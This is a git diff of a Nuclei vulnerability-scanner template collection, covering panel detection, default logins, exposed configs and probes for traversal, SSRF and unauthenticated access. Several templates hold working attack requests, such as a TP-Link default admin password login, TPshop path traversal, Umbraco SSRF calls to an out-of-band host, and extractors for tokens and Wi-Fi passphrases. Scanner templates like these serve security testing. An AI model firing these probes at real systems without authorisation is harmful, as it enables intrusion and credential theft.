+0,0 @@ -id: total-web-login - -info: - name: Total Web Solution - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6811 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Total Web Solutions' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/total-web.yaml b/nuclei-templates/Other/total-web.yaml new file mode 100644 index 0000000000..ecb0e56ec6 --- /dev/null +++ b/nuclei-templates/Other/total-web.yaml @@ -0,0 +1,20 @@ +id: total-web-login +info: + name: Total Web Solution + author: dhiyaneshDK + severity: info + reference: + - https://www.exploit-db.com/ghdb/6811 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - 'Total Web Solutions' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/tp-link-tl-r470gp-ac-default-login.yaml b/nuclei-templates/Other/tp-link-tl-r470gp-ac-default-login.yaml deleted file mode 100644 index 72a22019ca..0000000000 --- a/nuclei-templates/Other/tp-link-tl-r470gp-ac-default-login.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: tp-link-tl-r470gp-ac-default-login - -info: - name: TP-LINK TL-R470GP-AC - Default Login - author: SleepingBag945 - severity: high - description: | - TP-LINK TL-R470GP-AC 默认口令123456 - metadata: - fofa-query: title="TL-R470GP-AC" - tags: tp-link,default-login,router - -http: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json; charset=UTF-8 - X-Requested-With: XMLHttpRequest - - {"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}} - - matchers: - - type: word - part: body - words: - - "\"stok\"" - - "\"error_code\":0" - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/tplink-r470gp-default-login.yaml b/nuclei-templates/Other/tplink-r470gp-default-login.yaml new file mode 100644 index 0000000000..236ef6136b --- /dev/null +++ b/nuclei-templates/Other/tplink-r470gp-default-login.yaml @@ -0,0 +1,34 @@ +id: tp-link-tl-r470gp-ac-default-login + +info: + name: TP-LINK TL-R470GP-AC Default weak password + author: SleepingBag945 + severity: high + description: | + TP-LINK TL-R470GP-AC 默认口令123456 + metadata: + fofa-query: title="TL-R470GP-AC" + tags: tp-link,default-login,ac + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Connection: close + + {"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}} + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\"stok\"" + - "\"error_code\":0" + condition: and + + diff --git a/nuclei-templates/Other/tpshop-directory-traversal-10822.yaml b/nuclei-templates/Other/tpshop-directory-traversal-10822.yaml new file mode 100644 index 0000000000..47af9e5038 --- /dev/null +++ b/nuclei-templates/Other/tpshop-directory-traversal-10822.yaml @@ -0,0 +1,24 @@ +id: tpshop-directory-traversal + +info: + name: TPshop Directory Traversal + author: pikpikcu + severity: high + reference: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA + tags: tpshop,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../" + + matchers-condition: and + matchers: + + - type: word + words: + - '"state":"SUCCESS"' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/tpshop-directory-traversal.yaml b/nuclei-templates/Other/tpshop-directory-traversal.yaml deleted file mode 100644 index 7f794cefeb..0000000000 --- a/nuclei-templates/Other/tpshop-directory-traversal.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: tpshop-directory-traversal -info: - name: TPshop - Local File Inclusion - author: pikpikcu - description: TPshop is vulnerable to local file inclusion. - severity: high - reference: - - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: tpshop,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../" - matchers-condition: and - matchers: - - type: word - words: - - '"state":"SUCCESS"' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/nuclei-templates/Other/trace-axd-detect-10825.yaml b/nuclei-templates/Other/trace-axd-detect-10825.yaml deleted file mode 100644 index d6e003387f..0000000000 --- a/nuclei-templates/Other/trace-axd-detect-10825.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: trace-axd-detect - -info: - name: ASP.NET Trace.AXD Information Leak - author: dhiyaneshDK - severity: low - reference: https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/ - tags: logs,asp,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/Trace.axd" - - matchers-condition: and - matchers: - - type: word - words: - - '

    Application Trace

    ' - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/trace-axd-detect.yaml b/nuclei-templates/Other/trace-axd-detect.yaml new file mode 100644 index 0000000000..d9456ea822 --- /dev/null +++ b/nuclei-templates/Other/trace-axd-detect.yaml @@ -0,0 +1,19 @@ +id: trace-axd-detect +info: + name: ASP.NET Trace.AXD Information Leak + author: dhiyaneshDK + severity: low + reference: https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/ + tags: logs,asp,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/Trace.axd" + matchers-condition: and + matchers: + - type: word + words: + - '

    Application Trace

    ' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/trace-method-10828.yaml b/nuclei-templates/Other/trace-method-10828.yaml index e32507aa2d..8ede32ed2f 100644 --- a/nuclei-templates/Other/trace-method-10828.yaml +++ b/nuclei-templates/Other/trace-method-10828.yaml @@ -3,7 +3,7 @@ info: name: HTTP TRACE method enabled author: nodauf severity: info - tags: misc + tags: misc,generic reference: https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/ requests: - method: TRACE diff --git a/nuclei-templates/Other/api-travisci-506.yaml b/nuclei-templates/Other/travisci.yaml similarity index 100% rename from nuclei-templates/Other/api-travisci-506.yaml rename to nuclei-templates/Other/travisci.yaml diff --git a/nuclei-templates/Other/trilithic-viewpoint-login.yaml b/nuclei-templates/Other/trilithic-viewpoint-default-10835.yaml similarity index 100% rename from nuclei-templates/Other/trilithic-viewpoint-login.yaml rename to nuclei-templates/Other/trilithic-viewpoint-default-10835.yaml diff --git a/nuclei-templates/Other/tugboat-config-exposure-10842.yaml b/nuclei-templates/Other/tugboat-config-exposure-10842.yaml new file mode 100644 index 0000000000..cd0e1af78a --- /dev/null +++ b/nuclei-templates/Other/tugboat-config-exposure-10842.yaml @@ -0,0 +1,28 @@ +id: tugboat-config-exposure +info: + name: Tugboat configuration file exposure + description: Tugboat is a command line tool for interacting with your DigitalOcean droplets. + reference: https://github.com/petems/tugboat + author: geeknik + severity: critical + tags: tugboat,config,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/.tugboat" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "authentication" + - "access_token" + - "ssh_user" + condition: and + extractors: + - type: regex + part: body + regex: + - 'access_token: .*' diff --git a/nuclei-templates/Other/tugboat-config-exposure-10843.yaml b/nuclei-templates/Other/tugboat-config-exposure-10843.yaml deleted file mode 100644 index 50793f616a..0000000000 --- a/nuclei-templates/Other/tugboat-config-exposure-10843.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: tugboat-config-exposure - -info: - name: Tugboat configuration file exposure - description: Tugboat is a command line tool for interacting with your DigitalOcean droplets. - reference: https://github.com/petems/tugboat - author: geeknik - severity: critical - tags: tugboat,config,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/.tugboat" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "authentication" - - "access_token" - - "ssh_user" - condition: and - - extractors: - - type: regex - part: body - regex: - - 'access_token: .*' diff --git a/nuclei-templates/Other/tumblr-takeover-10846.yaml b/nuclei-templates/Other/tumblr-takeover-10846.yaml deleted file mode 100644 index 0a38a0f660..0000000000 --- a/nuclei-templates/Other/tumblr-takeover-10846.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: tumblr-takeover -info: - name: tumblr takeover detection - author: pdcommunity - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Whatever you were looking for doesn't currently exist at this address. - - There's nothing here. - condition: and diff --git a/nuclei-templates/Other/tumblr-takeover-10847.yaml b/nuclei-templates/Other/tumblr-takeover-10847.yaml new file mode 100644 index 0000000000..33f04761ce --- /dev/null +++ b/nuclei-templates/Other/tumblr-takeover-10847.yaml @@ -0,0 +1,23 @@ +id: tumblr-takeover +info: + name: tumblr takeover detection + author: pdteam,philippedelteil + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/240 +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - Whatever you were looking for doesn't currently exist at this address. + - There's nothing here. + condition: and + - type: dsl + dsl: + - '!contains(host,"tumblr.com")' + - '!contains(host,"txmblr.com")' + condition: and diff --git a/nuclei-templates/Other/turbocrm-xss-10848.yaml b/nuclei-templates/Other/turbocrm-xss-10848.yaml index 3967f32aff..dc6f06c42e 100644 --- a/nuclei-templates/Other/turbocrm-xss-10848.yaml +++ b/nuclei-templates/Other/turbocrm-xss-10848.yaml @@ -3,9 +3,7 @@ info: name: TurboCRM XSS author: pikpikcu severity: medium - description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application. - reference: - - https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a + reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a tags: xss,turbocrm requests: - method: GET diff --git a/nuclei-templates/Other/tuxedo-connected-controller.yaml b/nuclei-templates/Other/tuxedo-connected-controller.yaml index 161b524b4f..279b7c2248 100644 --- a/nuclei-templates/Other/tuxedo-connected-controller.yaml +++ b/nuclei-templates/Other/tuxedo-connected-controller.yaml @@ -3,9 +3,8 @@ info: name: Tuxedo Connected Controller author: dhiyaneshDk severity: info - reference: - - https://www.exploit-db.com/ghdb/6486 - tags: panel,tuxedo + reference: https://www.exploit-db.com/ghdb/6486 + tags: panel requests: - method: GET path: diff --git a/nuclei-templates/Other/twig-php-ssti-10859.yaml b/nuclei-templates/Other/twig-php-ssti-10856.yaml similarity index 100% rename from nuclei-templates/Other/twig-php-ssti-10859.yaml rename to nuclei-templates/Other/twig-php-ssti-10856.yaml diff --git a/nuclei-templates/Other/twilio-api-10861.yaml b/nuclei-templates/Other/twilio-api-10860.yaml similarity index 100% rename from nuclei-templates/Other/twilio-api-10861.yaml rename to nuclei-templates/Other/twilio-api-10860.yaml diff --git a/nuclei-templates/Other/twitter-secret-10862.yaml b/nuclei-templates/Other/twitter-secret-10862.yaml new file mode 100644 index 0000000000..e7052b9a1a --- /dev/null +++ b/nuclei-templates/Other/twitter-secret-10862.yaml @@ -0,0 +1,16 @@ +id: twitter-secret + +info: + name: Twitter Secret + author: gaurang + severity: medium + tags: token,file,twitter + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" diff --git a/nuclei-templates/Other/twitter-secret-11870.yaml b/nuclei-templates/Other/twitter-secret-11870.yaml deleted file mode 100644 index 713cfd3069..0000000000 --- a/nuclei-templates/Other/twitter-secret-11870.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: twitter-secret -info: - name: Twitter Secret - author: gaurang - severity: medium - tags: token,file,twitter -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" diff --git a/nuclei-templates/Other/uberflip-takeover.yaml b/nuclei-templates/Other/uberflip-takeover-10865.yaml similarity index 100% rename from nuclei-templates/Other/uberflip-takeover.yaml rename to nuclei-templates/Other/uberflip-takeover-10865.yaml diff --git a/nuclei-templates/Other/ucmdb-default-login-10871.yaml b/nuclei-templates/Other/ucmdb-default-login-10871.yaml index 53793d5fff..d7dc80bd03 100644 --- a/nuclei-templates/Other/ucmdb-default-login-10871.yaml +++ b/nuclei-templates/Other/ucmdb-default-login-10871.yaml @@ -1,14 +1,11 @@ id: ucmdb-default-login + info: - name: Micro Focus Universal CMDB Default Login + name: Micro Focus UCMDB Default Login author: dwisiswant0 severity: high - description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854. - reference: - - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm - classification: - cwe-id: CWE-798 tags: ucmdb,default-login + requests: - raw: - | @@ -16,20 +13,21 @@ requests: Host: {{Hostname}} customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB + attack: pitchfork payloads: username: - diagnostics password: - admin + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: header words: - "LWSSO_COOKIE_KEY" - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/Other/ueditor-file-upload-10876.yaml b/nuclei-templates/Other/ueditor-file-upload-10876.yaml deleted file mode 100644 index 2d584faeef..0000000000 --- a/nuclei-templates/Other/ueditor-file-upload-10876.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: ueditor-file-upload -info: - name: UEditor Arbitrary File Upload - author: princechaddha - severity: high - reference: | - - https://zhuanlan.zhihu.com/p/85265552 - - https://www.freebuf.com/vuls/181814.html - tags: ueditor,fileupload -requests: - - method: GET - path: - - "{{BaseURL}}/ueditor/net/controller.ashx?action=catchimage&encode=utf-8" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "没有指定抓取源" - part: body diff --git a/nuclei-templates/Other/ueditor-file-upload.yaml b/nuclei-templates/Other/ueditor-file-upload.yaml new file mode 100644 index 0000000000..733c46e297 --- /dev/null +++ b/nuclei-templates/Other/ueditor-file-upload.yaml @@ -0,0 +1,24 @@ +id: ueditor-file-upload +info: + name: UEditor Arbitrary File Upload + author: princechaddha + severity: high + description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code. + reference: + - https://zhuanlan.zhihu.com/p/85265552 + - https://www.freebuf.com/vuls/181814.html + tags: ueditor,fileupload + +requests: + - method: GET + path: + - "{{BaseURL}}/ueditor/net/controller.ashx?action=catchimage&encode=utf-8" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "没有指定抓取源" + part: body diff --git a/nuclei-templates/Other/umbraco-base-ssrf-10880.yaml b/nuclei-templates/Other/umbraco-base-ssrf-10880.yaml new file mode 100644 index 0000000000..a5c50e095c --- /dev/null +++ b/nuclei-templates/Other/umbraco-base-ssrf-10880.yaml @@ -0,0 +1,41 @@ +id: umbraco-base-ssrf + +info: + name: Umbraco 8.14.1 - baseUrl Server-Side Request Forgery (SSRF) + author: dhiyaneshDk + severity: medium + description: Umbraco 8.1.4.1 allows attackers to use the baseUrl parameter to several programs to perform a server-side request forgery (SSRF) attack. + reference: + - https://www.exploit-db.com/exploits/50462 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 6.8 + cwe-id: CWE-918 + metadata: + verified: true + shodan-query: http.html:"Umbraco" + tags: ssrf,umbraco,oast + +requests: + - method: GET + path: + - '{{BaseURL}}/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}' + - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/' + - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/' + + stop-at-first-match: true + req-condition: true + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: dsl + dsl: + - "len(body_1)==0" + - "len(body_2)==0" + - "len(body_3)==0" + +# Enhanced by cs 08/03/2022 diff --git a/nuclei-templates/Other/umbraco-base-ssrf.yaml b/nuclei-templates/Other/umbraco-base-ssrf.yaml deleted file mode 100644 index 11f785e41e..0000000000 --- a/nuclei-templates/Other/umbraco-base-ssrf.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: umbraco-base-ssrf -info: - name: Umbraco v8.14.1 - 'baseUrl' SSRF - author: dhiyaneshDk - severity: medium - reference: - - https://www.exploit-db.com/exploits/50462 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N - cvss-score: 5.3 - cve-id: CVE-2020-10770 - cwe-id: CWE-601 - tags: ssrf,umbraco,oast -requests: - - method: GET - path: - - '{{BaseURL}}/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}' - - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/' - - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/' - stop-at-first-match: true - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/Other/unauth-ftp-10940.yaml b/nuclei-templates/Other/unauth-ftp-10940.yaml deleted file mode 100644 index 12d9dba01b..0000000000 --- a/nuclei-templates/Other/unauth-ftp-10940.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: unauth-ftp -info: - name: FTP Anonymous Login - author: C3l3si4n - severity: medium - reference: https://tools.ietf.org/html/rfc2577 - tags: network,ftp -network: - - inputs: - - data: "USER anonymous\r\nPASS nuclei\r\n" - host: - - "{{Host}}:21" - - "{{Hostname}}" - matchers: - - type: word - words: - - "Anonymous access allowed," - part: all diff --git a/nuclei-templates/Other/unauth-ftp.yaml b/nuclei-templates/Other/unauth-ftp.yaml new file mode 100644 index 0000000000..e3c21171fa --- /dev/null +++ b/nuclei-templates/Other/unauth-ftp.yaml @@ -0,0 +1,23 @@ +id: unauth-ftp + +info: + name: FTP Anonymous Login + author: C3l3si4n + severity: medium + reference: + - https://tools.ietf.org/html/rfc2577 + tags: network,ftp + +network: + - inputs: + - data: "USER anonymous\r\nPASS nuclei\r\n" + + host: + - "{{Host}}:21" + - "{{Hostname}}" + + matchers: + - type: word + words: + - "Anonymous access allowed," + part: response \ No newline at end of file diff --git a/nuclei-templates/Other/unauth-hoteldruid-panel-10943.yaml b/nuclei-templates/Other/unauth-hoteldruid-panel-10943.yaml new file mode 100644 index 0000000000..921549ed63 --- /dev/null +++ b/nuclei-templates/Other/unauth-hoteldruid-panel-10943.yaml @@ -0,0 +1,28 @@ +id: unauth-hoteldruid-panel +info: + name: Unauthenticated Hoteldruid Panel + author: princechaddha + severity: high + description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. + reference: https://www.hoteldruid.com/ + tags: hoteldruid,panel,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/hoteldruid/inizio.php" + - "{{BaseURL}}/inizio.php" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - " HotelDruid " + - "INSERT:" + - "TABLES:" + condition: and diff --git a/nuclei-templates/Other/unauth-hoteldruid-panel.yaml b/nuclei-templates/Other/unauth-hoteldruid-panel.yaml deleted file mode 100644 index 9897bff31a..0000000000 --- a/nuclei-templates/Other/unauth-hoteldruid-panel.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: unauth-hoteldruid-panel -info: - name: Unauthenticated Hoteldruid Panel - author: princechaddha - severity: high - description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. - reference: https://www.hoteldruid.com/ - tags: hoteldruid,panel,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/hoteldruid/inizio.php" - - "{{BaseURL}}/inizio.php" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - " HotelDruid " - - "INSERT:" - - "TABLES:" - condition: and diff --git a/nuclei-templates/Other/unauth-message-read.yaml b/nuclei-templates/Other/unauth-message-read.yaml index 0a9852f51d..7bb025a118 100644 --- a/nuclei-templates/Other/unauth-message-read.yaml +++ b/nuclei-templates/Other/unauth-message-read.yaml @@ -1,10 +1,17 @@ id: rocketchat-unauth-access info: - name: RocketChat Unauthenticated Read Access + name: RocketChat Live Chat - Unauthenticated Read Access author: rojanrijal - severity: critical - description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens. - reference: https://docs.rocket.chat/guides/security/security-updates + severity: high + description: RocketChat Live Chat accepts invalid parameters that could potentially allow unauthenticated access to messages and user tokens. + reference: + - https://docs.rocket.chat/guides/security/security-updates + - https://securifyinc.com/disclosures/rocketchat-unauthenticated-access-to-messages + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-522 + remediation: Fixed in versions 3.11, 3.10.5, 3.9.7, and 3.8.8. tags: rocketchat,unauth requests: - raw: @@ -25,12 +32,14 @@ requests: {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"} matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - '"{\"msg\":\"result\",\"result\":{\"messages\"' - '"success":true' - part: body condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/nuclei-templates/Other/unauth-spark-api-10963.yaml b/nuclei-templates/Other/unauth-spark-api-10963.yaml new file mode 100644 index 0000000000..56ccbcbe76 --- /dev/null +++ b/nuclei-templates/Other/unauth-spark-api-10963.yaml @@ -0,0 +1,24 @@ +id: unauth-spark-api +info: + name: Unauthenticated Spark REST API + author: princechaddha + severity: medium + description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it. + reference: https://xz.aliyun.com/t/2490 + tags: spark,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/v1/submissions" + matchers-condition: and + matchers: + - type: status + status: + - 400 + - type: word + words: + - "Missing an action" + - "serverSparkVersion" + part: body + condition: and diff --git a/nuclei-templates/Other/unauth-spark-api-10965.yaml b/nuclei-templates/Other/unauth-spark-api-10965.yaml deleted file mode 100644 index 2025d7145b..0000000000 --- a/nuclei-templates/Other/unauth-spark-api-10965.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: unauth-spark-api -info: - name: Unauthenticated Spark REST API - author: princechaddha - severity: medium - description: The Spark product's REST API interface allows access to unauthenticated users. - remediation: Restrict access the exposed API ports. - reference: https://xz.aliyun.com/t/2490 - tags: spark,unauth - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 -requests: - - method: GET - path: - - "{{BaseURL}}/v1/submissions" - matchers-condition: and - matchers: - - type: status - status: - - 400 - - type: word - words: - - "Missing an action" - - "serverSparkVersion" - part: body - condition: and - -# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/Other/unauth-wavink-panel-10967.yaml b/nuclei-templates/Other/unauth-wavink-panel-10967.yaml deleted file mode 100644 index b8b4606cd0..0000000000 --- a/nuclei-templates/Other/unauth-wavink-panel-10967.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: unauth-wavink-panel -info: - name: Wavlink Panel - Unauthenticated Access - author: princechaddha - severity: high - description: Wavlink Panel was able to be accessed with no authentication requirements in place. - metadata: - verified: true - shodan-query: http.title:"Wi-Fi APP Login" - tags: exposure,wavlink,unauth,misconfig,router -requests: - - method: GET - path: - - "{{BaseURL}}/wifi_base.shtml" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "APP" - - type: regex - part: body - regex: - - 'var passphraseKey12="(.*)";' - - type: word - part: body - negative: true - words: - - 'var passphraseKey12="";' - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - 'var passphraseKey12="(.*)";' - -# Enhanced by mp on 2022/07/21 diff --git a/nuclei-templates/Other/unauth-wavink-panel.yaml b/nuclei-templates/Other/unauth-wavink-panel.yaml new file mode 100644 index 0000000000..7cfb589868 --- /dev/null +++ b/nuclei-templates/Other/unauth-wavink-panel.yaml @@ -0,0 +1,37 @@ +id: unauth-wavink-panel +info: + name: Unauthenticated Wavlink Panel + author: princechaddha + severity: high + metadata: + verified: true + shodan-query: http.title:"Wi-Fi APP Login" + tags: exposure,wavlink,unauth,misconfig,router +requests: + - method: GET + path: + - "{{BaseURL}}/wifi_base.shtml" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "APP" + - type: regex + part: body + regex: + - 'var passphraseKey12="(.*)";' + - type: word + part: body + negative: true + words: + - 'var passphraseKey12="";' + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - 'var passphraseKey12="(.*)";' diff --git a/nuclei-templates/Other/unauth-xproxy-dashboard.yaml b/nuclei-templates/Other/unauth-xproxy-dashboard.yaml index c7d01f13ff..9041812254 100644 --- a/nuclei-templates/Other/unauth-xproxy-dashboard.yaml +++ b/nuclei-templates/Other/unauth-xproxy-dashboard.yaml @@ -1,23 +1,27 @@ -id: unauth-xproxy-dashboard -info: - name: X-Proxy Dashboard Detect - author: pussycat0x - severity: high - metadata: - fofa-dork: "X-Proxy Dashboard" - tags: xproxy,panel -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'X-Proxy' - - 'Dashboard    ' - condition: and - - type: status - status: - - 200 +id: unauth-xproxy-dashboard + +info: + name: X-Proxy Dashboard Detect + author: pussycat0x + severity: high + metadata: + fofa-dork: "X-Proxy Dashboard" + tags: xproxy,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'X-Proxy' + - 'Dashboard' + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/unauthenticated-airflow.yaml b/nuclei-templates/Other/unauthenticated-airflow.yaml index addadb23e3..afe4ed1f3c 100644 --- a/nuclei-templates/Other/unauthenticated-airflow.yaml +++ b/nuclei-templates/Other/unauthenticated-airflow.yaml @@ -3,9 +3,9 @@ info: name: Unauthenticated Airflow Instance author: dhiyaneshDK severity: high - tags: apache,airflow,unauth metadata: shodan-query: title:"Airflow - DAGs" + tags: apache,airflow,unauth requests: - method: GET path: diff --git a/nuclei-templates/Other/unauthenticated-alert-manager-10892.yaml b/nuclei-templates/Other/unauthenticated-alert-manager.yaml similarity index 100% rename from nuclei-templates/Other/unauthenticated-alert-manager-10892.yaml rename to nuclei-templates/Other/unauthenticated-alert-manager.yaml diff --git a/nuclei-templates/Other/unauthenticated-frp-10897.yaml b/nuclei-templates/Other/unauthenticated-frp-10897.yaml new file mode 100644 index 0000000000..33cf66b2af --- /dev/null +++ b/nuclei-templates/Other/unauthenticated-frp-10897.yaml @@ -0,0 +1,21 @@ +id: unauthenticated-frp +info: + name: Unauthenticated FRP + author: pikpikcu + severity: info + tags: frp,unauth,panel + reference: + - https://github.com/fatedier/frp/ # vendor homepage +requests: + - method: GET + path: + - "{{BaseURL}}/static/" + matchers-condition: and + matchers: + - type: word + words: + - "frps dashboard" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/unauthenticated-frp.yaml b/nuclei-templates/Other/unauthenticated-frp.yaml deleted file mode 100644 index a970101294..0000000000 --- a/nuclei-templates/Other/unauthenticated-frp.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: unauthenticated-frp -info: - name: Unauthenticated FRP - author: pikpikcu - severity: info - reference: - - https://github.com/fatedier/frp/ - tags: frp,unauth,panel -requests: - - method: GET - path: - - "{{BaseURL}}/static/" - matchers-condition: and - matchers: - - type: word - words: - - "frps dashboard" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/unauthenticated-glowroot-10900.yaml b/nuclei-templates/Other/unauthenticated-glowroot-10900.yaml deleted file mode 100644 index 12e73021c2..0000000000 --- a/nuclei-templates/Other/unauthenticated-glowroot-10900.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: unauthenticated-glowroot - -info: - name: Glowroot Anonymous User - author: pussycat0x - severity: high - description: Anonymous user access allows to understand the host internals - reference: https://www.shodan.io/search?query=http.title%3A%22Glowroot%22 - tags: misconfig,unauth,glowroot - -requests: - - method: GET - path: - - '{{BaseURL}}/backend/admin/users?username=anonymous' - - matchers-condition: and - matchers: - - type: word - words: - - '"username":"anonymous"' - - '"Administrator"' - - '"newPassword":""' - condition: and - - - type: word - words: - - "application/json" - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/unauthenticated-glowroot.yaml b/nuclei-templates/Other/unauthenticated-glowroot.yaml new file mode 100644 index 0000000000..7b724ea0ac --- /dev/null +++ b/nuclei-templates/Other/unauthenticated-glowroot.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-glowroot +info: + name: Glowroot Anonymous User + author: pussycat0x + severity: high + description: Anonymous user access allows to understand the host internals + reference: https://www.shodan.io/search?query=http.title%3A%22Glowroot%22 + tags: misconfig,unauth,glowroot +requests: + - method: GET + path: + - '{{BaseURL}}/backend/admin/users?username=anonymous' + matchers-condition: 